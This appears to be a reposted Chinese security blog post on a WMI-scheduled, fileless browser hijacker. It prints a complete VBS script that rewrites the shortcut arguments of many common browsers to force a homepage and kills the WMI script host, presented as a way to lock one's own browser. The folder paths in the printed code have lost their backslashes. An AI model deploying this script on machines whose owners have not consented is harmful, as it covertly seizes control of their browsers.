Fileless Browser Hijacker劫持浏览器首页

2021年9月4日05:44:17评论113 views字数 2157阅读7分11秒阅读模式

From:
http://zone.wooyun.org/content/26997

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本，执行后可修改当前系统中常见浏览器的主页
通过wmi定时调用此脚本可实现无文件劫持浏览器主页
原文已给出防御和检测方法，所以此处略
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下，主页锁定为http://www.baidu.com

Dim objFS Set objFS = CreateObject("Scripting.FileSystemObject") On Error Resume Next Const link = "http://www.baidu.com" browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe") Set BrowserDic = CreateObject("scripting.dictionary") For Each browser In browsers BrowserDic.Add LCase(browser), browser Next Dim FoldersDic(12) Set WshShell = CreateObject("Wscript.Shell") FoldersDic(0) = "C:UsersPublicDesktop" FoldersDic(1) = "C:ProgramDataMicrosoftWindowsStart Menu" FoldersDic(2) = "C:ProgramDataMicrosoftWindowsStart MenuPrograms" FoldersDic(3) = "C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup" FoldersDic(4) = "C:UsersaDesktop" FoldersDic(5) = "C:UsersaAppDataRoamingMicrosoftWindowsStart Menu" FoldersDic(6) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuPrograms" FoldersDic(7) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup" FoldersDic(8) = "C:UsersaAppDataRoaming" FoldersDic(9) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick Launch" FoldersDic(10) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu" FoldersDic(11) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar" Set fso = CreateObject("Scripting.Filesystemobject") For i = 0 To UBound(FoldersDic) For Each file In fso.GetFolder(FoldersDic(i)).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If BrowserDic.Exists(LCase(name)) Then oShellLink.Arguments = link If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next Next createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

执行后会更改系统中浏览器的主页，如图

本文始发于微信公众号（关注安全技术）：Fileless Browser Hijacker劫持浏览器首页

左青龙
微信扫一扫

右白虎
微信扫一扫

Fileless Browser Hijacker劫持浏览器首页

实战环境中的Redis 延时注入

【2024挖矿应急实战】记录一次HW前夕的挖矿病毒应急实战

引入弹性架构，到底是为什么？

一个IP Getshell

渗透测试实战分享

如何将DOM XSS升级为一键帐户接管（上集）

2024年网络威胁概览（05）| 供应链安全：漏洞的连锁反应

xx集团存在弱口令、sql注入、内网突破

TP-Link AC1750 漏洞挖掘的文章（2022）- Pwn2Own 2021

某众测前端解密学习记录

发表评论

在线咨询

微信